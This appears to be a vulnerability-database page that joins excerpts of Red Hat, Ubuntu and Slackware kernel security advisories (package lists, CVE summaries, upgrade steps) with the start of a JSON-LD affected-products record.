aarch64: kernel-4.14.0-115.17.1.el7a.aarch64.rpm kernel-debug-4.14.0-115.17.1.el7a.aarch64.rpm kernel-debug-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm kernel-debug-devel-4.14.0-115.17.1.el7a.aarch64.rpm kernel-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm kernel-debuginfo-common-aarch64-4.14.0-115.17.1.el7a.aarch64.rpm kernel-devel-4.14.0-115.17.1.el7a.aarch64.rpm kernel-headers-4.14.0-115.17.1.el7a.aarch64.rpm kernel-tools-4.14.0-115.17.1.el7a.aarch64.rpm kernel-tools-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm kernel-tools-libs-4.14.0-115.17.1.el7a.aarch64.rpm perf-4.14.0-115.17.1.el7a.aarch64.rpm perf-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm python-perf-4.14.0-115.17.1.el7a.aarch64.rpm python-perf-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm

noarch: kernel-abi-whitelists-4.14.0-115.17.1.el7a.noarch.rpm kernel-doc-4.14.0-115.17.1.el7a.noarch.rpm

ppc64le: kernel-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-bootwrapper-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-debug-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-debug-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-devel-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-headers-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-tools-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-tools-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-tools-libs-4.14.0-115.17.1.el7a.ppc64le.rpm perf-4.14.0-115.17.1.el7a.ppc64le.rpm perf-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm python-perf-4.14.0-115.17.1.el7a.ppc64le.rpm python-perf-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm

s390x: kernel-4.14.0-115.17.1.el7a.s390x.rpm kernel-debug-4.14.0-115.17.1.el7a.s390x.rpm kernel-debug-debuginfo-4.14.0-115.17.1.el7a.s390x.rpm kernel-debug-devel-4.14.0-115.17.1.el7a.s390x.rpm kernel-debuginfo-4.14.0-115.17.1.el7a.s390x.rpm kernel-debuginfo-common-s390x-4.14.0-115.17.1.el7a.s390x.rpm kernel-devel-4.14.0-115.17.1.el7a.s390x.rpm kernel-headers-4.14.0-115.17.1.el7a.s390x.rpm kernel-kdump-4.14.0-115.17.1.el7a.s390x.rpm kernel-kdump-debuginfo-4.14.0-115.17.1.el7a.s390x.rpm kernel-kdump-devel-4.14.0-115.17.1.el7a.s390x.rpm perf-4.14.0-115.17.1.el7a.s390x.rpm perf-debuginfo-4.14.0-115.17.1.el7a.s390x.rpm python-perf-4.14.0-115.17.1.el7a.s390x.rpm python-perf-debuginfo-4.14.0-115.17.1.el7a.s390x.rpm

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):

aarch64: kernel-debug-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm kernel-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm kernel-debuginfo-common-aarch64-4.14.0-115.17.1.el7a.aarch64.rpm kernel-tools-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm kernel-tools-libs-devel-4.14.0-115.17.1.el7a.aarch64.rpm perf-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm python-perf-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm

noarch: kernel-doc-4.14.0-115.17.1.el7a.noarch.rpm

ppc64le: kernel-debug-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-debug-devel-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-tools-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm kernel-tools-libs-devel-4.14.0-115.17.1.el7a.ppc64le.rpm perf-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm python-perf-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2018-3693 https://access.redhat.com/security/cve/CVE-2018-18559 https://access.redhat.com/security/cve/CVE-2019-3846 https://access.redhat.com/security/cve/CVE-2019-8912 https://access.redhat.com/security/cve/CVE-2019-10126 https://access.redhat.com/security/cve/CVE-2019-11487 https://access.redhat.com/security/cve/CVE-2019-14814 https://access.redhat.com/security/cve/CVE-2019-14815 https://access.redhat.com/security/cve/CVE-2019-14816 https://access.redhat.com/security/cve/CVE-2019-17133 https://access.redhat.com/security/cve/CVE-2019-18660 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/solutions/3523601

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBXicdstzjgjWX9erEAQhaAg/+Le4hXIniwOYkxMgX2EDRuNHUKv5GXxXw XRlVtHog2k1uDkvYFF1C2t44nRIt0C2H+ZyfnqjyNHzEcGSHMh6xC95wtmpmvLJT jOYFbAAuVa+ABCwHnMlNfs8oqGWz2lr76EPP4Sp01yHk46MZ4MkkmqSr6Jr7BCZ0 CB5QjX1T+jVK2xDuHMnUzIM4FDKzAgU4ERsNc2KFk8sNM9rNMsZmL+MKPqm+WZDG 7R+Whc8VIxOf2N4QvWxTh8b4Nl+TBE8qCmfx1ZGud+S7/S4cEqyL6kKVIdp0OFLZ YcC46pBx7mtjm93KalKJ2NM0vxRZ9R5uXtRjxcCuchbZZqTI4c2lWlarY0beGHqZ KTRew0qIsfpD9dMmcbJ9SiLwDpjNtfxmcAC7yL9ixveqdcEzc2ko6IdXqLgxWuSX GqK0pR2qEafzV/pRE+DsflxhJGPXLt9YXWeMLUY4WodM9h6VKl+btTLjC++Pg+9O XdwPhlfkNAaA0Xukk8safFCh/uy1xoC/rHZDEQ6K4Cq2tQIG6XIeHzW8vLesXuKw ckO6q3mQ3khVqgiC3Z06GO+hmyGiWzkx58V37Bap4EoiqrQsNmf1g5RHARaGK5fQ 8V9IoiQEZ7wTTOd42GvGlipbONMlOkkj2jDt76/2ToQ179ONZwWhm+kHq0bFGXW0 F29iywHLuq8=gRWJ -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Kernel Live Patch Security Notice 0058-1 October 22, 2019

linux vulnerability

A security issue affects these releases of Ubuntu:

| Series | Base kernel | Arch | flavors | |------------------+--------------+----------+------------------| | Ubuntu 18.04 LTS | 4.15.0 | amd64 | aws | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | lowlatency | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | oem | | Ubuntu 18.04 LTS | 5.0.0 | amd64 | azure | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | aws | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | azure | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | lowlatency |

Summary:

Several security issues were fixed in the kernel.

Software Description: - linux: Linux kernel

Details:

It was discovered that a race condition existed in the GFS2 file system in the Linux kernel. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2016-10905)

It was discovered that a use-after-free error existed in the block layer subsystem of the Linux kernel when certain failure conditions occurred. (CVE-2018-20856)

It was discovered that the USB gadget Midi driver in the Linux kernel contained a double-free vulnerability when handling certain error conditions. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-20961)

It was discovered that the XFS file system in the Linux kernel did not properly handle mount failures in some situations. (CVE-2018-20976)

It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not did not handle detach operations correctly, leading to a use-after-free vulnerability. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-21008)

It was discovered that the Intel Wi-Fi device driver in the Linux kernel did not properly validate certain Tunneled Direct Link Setup (TDLS). A physically proximate attacker could use this to cause a denial of service (Wi-Fi disconnect). (CVE-2019-0136)

It was discovered that the Linux kernel on ARM processors allowed a tracing process to modify a syscall after a seccomp decision had been made on that syscall. A local attacker could possibly use this to bypass seccomp restrictions. (CVE-2019-2054)

It was discovered that an integer overflow existed in the Binder implementation of the Linux kernel, leading to a buffer overflow. A local attacker could use this to escalate privileges. (CVE-2019-2181)

It was discovered that the Marvell Wireless LAN device driver in the Linux kernel did not properly validate the BSS descriptor. (CVE-2019-10126)

It was discovered that the Bluetooth UART implementation in the Linux kernel did not properly check for missing tty operations. A local attacker could use this to cause a denial of service. (CVE-2019-10207)

Jonathan Looney discovered that an integer overflow existed in the Linux kernel when handling TCP Selective Acknowledgments (SACKs). A remote attacker could use this to cause a denial of service (system crash). (CVE-2019-11477)

Jonathan Looney discovered that the TCP retransmission queue implementation in the Linux kernel could be fragmented when handling certain TCP Selective Acknowledgment (SACK) sequences. A remote attacker could use this to cause a denial of service. (CVE-2019-11478)

It was discovered that the ext4 file system implementation in the Linux kernel did not properly zero out memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-11833)

It was discovered that the PowerPC dlpar implementation in the Linux kernel did not properly check for allocation errors in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-12614)

It was discovered that the floppy driver in the Linux kernel did not properly validate meta data, leading to a buffer overread. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14283)

It was discovered that the floppy driver in the Linux kernel did not properly validate ioctl() calls, leading to a division-by-zero. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14284)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14814)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14815)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14816)

Matt Delco discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform bounds checking when handling coalesced MMIO write operations. A local attacker with write access to /dev/kvm could use this to cause a denial of service (system crash). (CVE-2019-14821)

Peter Pi discovered a buffer overflow in the virtio network backend (vhost_net) implementation in the Linux kernel. (CVE-2019-14835)

Update instructions:

The problem can be corrected by updating your livepatches to the following versions:

| Kernel | Version | flavors | |--------------------------+----------+--------------------------| | 4.4.0-148.174 | 58.1 | lowlatency, generic | | 4.4.0-148.174~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-150.176 | 58.1 | generic, lowlatency | | 4.4.0-150.176~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-151.178 | 58.1 | lowlatency, generic | | 4.4.0-151.178~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-154.181 | 58.1 | lowlatency, generic | | 4.4.0-154.181~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-157.185 | 58.1 | lowlatency, generic | | 4.4.0-157.185~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-159.187 | 58.1 | lowlatency, generic | | 4.4.0-159.187~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-161.189 | 58.1 | lowlatency, generic | | 4.4.0-161.189~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-164.192 | 58.1 | lowlatency, generic | | 4.4.0-164.192~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-165.193 | 58.1 | generic, lowlatency | | 4.4.0-1083.93 | 58.1 | aws | | 4.4.0-1084.94 | 58.1 | aws | | 4.4.0-1085.96 | 58.1 | aws | | 4.4.0-1087.98 | 58.1 | aws | | 4.4.0-1088.99 | 58.1 | aws | | 4.4.0-1090.101 | 58.1 | aws | | 4.4.0-1092.103 | 58.1 | aws | | 4.4.0-1094.105 | 58.1 | aws | | 4.15.0-50.54 | 58.1 | generic, lowlatency | | 4.15.0-50.54~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-51.55 | 58.1 | generic, lowlatency | | 4.15.0-51.55~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-52.56 | 58.1 | lowlatency, generic | | 4.15.0-52.56~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-54.58 | 58.1 | generic, lowlatency | | 4.15.0-54.58~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-55.60 | 58.1 | generic, lowlatency | | 4.15.0-58.64 | 58.1 | generic, lowlatency | | 4.15.0-58.64~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-60.67 | 58.1 | lowlatency, generic | | 4.15.0-60.67~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-62.69 | 58.1 | generic, lowlatency | | 4.15.0-62.69~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-64.73 | 58.1 | generic, lowlatency | | 4.15.0-64.73~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-65.74 | 58.1 | lowlatency, generic | | 4.15.0-1038.43 | 58.1 | oem | | 4.15.0-1039.41 | 58.1 | aws | | 4.15.0-1039.44 | 58.1 | oem | | 4.15.0-1040.42 | 58.1 | aws | | 4.15.0-1041.43 | 58.1 | aws | | 4.15.0-1043.45 | 58.1 | aws | | 4.15.0-1043.48 | 58.1 | oem | | 4.15.0-1044.46 | 58.1 | aws | | 4.15.0-1045.47 | 58.1 | aws | | 4.15.0-1045.50 | 58.1 | oem | | 4.15.0-1047.49 | 58.1 | aws | | 4.15.0-1047.51 | 58.1 | azure | | 4.15.0-1048.50 | 58.1 | aws | | 4.15.0-1049.54 | 58.1 | azure | | 4.15.0-1050.52 | 58.1 | aws | | 4.15.0-1050.55 | 58.1 | azure | | 4.15.0-1050.57 | 58.1 | oem | | 4.15.0-1051.53 | 58.1 | aws | | 4.15.0-1051.56 | 58.1 | azure | | 4.15.0-1052.57 | 58.1 | azure | | 4.15.0-1055.60 | 58.1 | azure | | 4.15.0-1056.61 | 58.1 | azure | | 4.15.0-1056.65 | 58.1 | oem | | 4.15.0-1057.62 | 58.1 | azure | | 4.15.0-1057.66 | 58.1 | oem | | 4.15.0-1059.64 | 58.1 | azure | | 5.0.0-1014.14~18.04.1 | 58.1 | azure | | 5.0.0-1016.17~18.04.1 | 58.1 | azure | | 5.0.0-1018.19~18.04.1 | 58.1 | azure | | 5.0.0-1020.21~18.04.1 | 58.1 | azure |

Support Information:

Kernels older than the levels listed below do not receive livepatch updates. Please upgrade your kernel as soon as possible.

| Series | Version | Flavors | |------------------+------------------+--------------------------| | Ubuntu 18.04 LTS | 4.15.0-1039 | aws | | Ubuntu 16.04 LTS | 4.4.0-1083 | aws | | Ubuntu 18.04 LTS | 5.0.0-1000 | azure | | Ubuntu 16.04 LTS | 4.15.0-1047 | azure | | Ubuntu 18.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 16.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 14.04 LTS | 4.4.0-148 | generic lowlatency | | Ubuntu 18.04 LTS | 4.15.0-1038 | oem | | Ubuntu 16.04 LTS | 4.4.0-148 | generic lowlatency |

References: CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, CVE-2019-14821, CVE-2019-14835

-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

[slackware-security] Slackware 14.2 kernel (SSA:2019-311-01)

New kernel packages are available for Slackware 14.2 to fix security issues.

Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/linux-4.4.199/: Upgraded. These updates fix various bugs and security issues. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 4.4.191: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117 Fixed in 4.4.193: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835 Fixed in 4.4.194: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821 Fixed in 4.4.195: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054 Fixed in 4.4.196: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215 Fixed in 4.4.197: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976 Fixed in 4.4.198: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133 Fixed in 4.4.199: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098 ( Security fix *) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199_smp-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199_smp-noarch-1.txz

Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199-noarch-1.txz

MD5 signatures: +-------------+

Slackware 14.2 packages:

0e523f42e759ecc2399f36e37672f110 kernel-generic-4.4.199-i586-1.txz ee6451f5362008b46fee2e08e3077b21 kernel-generic-smp-4.4.199_smp-i686-1.txz a8338ef88f2e3ea9c74d564c36ccd420 kernel-headers-4.4.199_smp-x86-1.txz cd9e9c241e4eec2fba1dae658a28870e kernel-huge-4.4.199-i586-1.txz 842030890a424023817d42a83a86a7f4 kernel-huge-smp-4.4.199_smp-i686-1.txz 257db024bb4501548ac9118dbd2d9ae6 kernel-modules-4.4.199-i586-1.txz 96377cbaf7bca55aaca70358c63151a7 kernel-modules-smp-4.4.199_smp-i686-1.txz 0673e86466f9e624964d95107cf6712f kernel-source-4.4.199_smp-noarch-1.txz

Slackware x86_64 14.2 packages: 6d1ff428e7cad6caa8860acc402447a1 kernel-generic-4.4.199-x86_64-1.txz dadc091dc725b8227e0d1e35098d6416 kernel-headers-4.4.199-x86-1.txz f5f4c034203f44dd1513ad3504c42515 kernel-huge-4.4.199-x86_64-1.txz a5337cd8b2ca80d4d93b9e9688e42b03 kernel-modules-4.4.199-x86_64-1.txz 5dd6e46c04f37b97062dc9e52cc38add kernel-source-4.4.199-noarch-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg kernel-*.txz

If you are using an initrd, you'll need to rebuild it.

For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash

For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash

Please note that "uniprocessor" has to do with the kernel you are running, not with the CPU. Most systems should run the SMP kernel (if they can) regardless of the number of cores the CPU has. If you aren't sure which kernel you are running, run "uname -a". If you see SMP there, you are running the SMP kernel and should use the 4.4.199-smp version when running mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit systems should always use 4.4.199 as the version.

If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting.

If using LILO: By default, lilo.conf contains an image= line that references a symlink that always points to the correct kernel. No editing should be required unless your machine uses a custom lilo.conf. If that is the case, be sure that the image= line references the correct kernel file. Either way, you'll need to run "lilo" as root to reinstall the boot loader.

If using elilo: Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 19.04 for Ubuntu 18.04 LTS. Please note that the RDS protocol is blacklisted in Ubuntu by default. (CVE-2019-2181)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 18.04 LTS: linux-image-5.0.0-1021-gcp 5.0.0-1021.21~18.04.1 linux-image-5.0.0-1023-azure 5.0.0-1023.24~18.04.1 linux-image-5.0.0-1023-gke 5.0.0-1023.23~18.04.2 linux-image-5.0.0-32-generic 5.0.0-32.34~18.04.2 linux-image-5.0.0-32-generic-lpae 5.0.0-32.34~18.04.2 linux-image-5.0.0-32-lowlatency 5.0.0-32.34~18.04.2 linux-image-azure 5.0.0.1023.33 linux-image-gcp 5.0.0.1021.26 linux-image-generic-hwe-18.04 5.0.0.32.89 linux-image-generic-lpae-hwe-18.04 5.0.0.32.89 linux-image-gke-5.0 5.0.0.1023.12 linux-image-lowlatency-hwe-18.04 5.0.0.32.89 linux-image-snapdragon-hwe-18.04 5.0.0.32.89 linux-image-virtual-hwe-18.04 5.0.0.32.89

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 8) - aarch64, noarch, ppc64le, s390x, x86_64

Bug Fix(es):

  • [Azure][8.1] Include patch "PCI: hv: Avoid use of hv_pci_dev->pci_slot after freeing it" (BZ#1764635)

  • block layer: update to v5.3 (BZ#1777766)

  • backport xfs: fix missing ILOCK unlock when xfs_setattr_nonsize fails due to EDQUOT (BZ#1778692)

  • Backport important bugfixes from upstream post 5.3 (BZ#1778693)

  • LUN path recovery issue with Emulex LPe32002 HBA in RHEL 8.0 Server during storage side cable pull testing (BZ#1781108)

  • cifs tasks enter D state and error out with "CIFS VFS: SMB signature verification returned error = -5" (BZ#1781110)

  • Update CIFS to linux 5.3 (except RDMA and conflicts) (BZ#1781113)

  • RHEL8.0 - Regression to RHEL7.6 by changing force_latency found during RHEL8.0 validation for SAP HANA on POWER (BZ#1781114)

  • blk-mq: overwirte performance drops on real MQ device (BZ#1782181)

  • 8) - x86_64

Bug Fix(es):

  • kernel-rt: update RT source tree to the RHEL-8.1.z2 source tree (BZ#1780326)

4

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201909-1527",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "c190",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "messaging realtime grid",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "2.0"
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
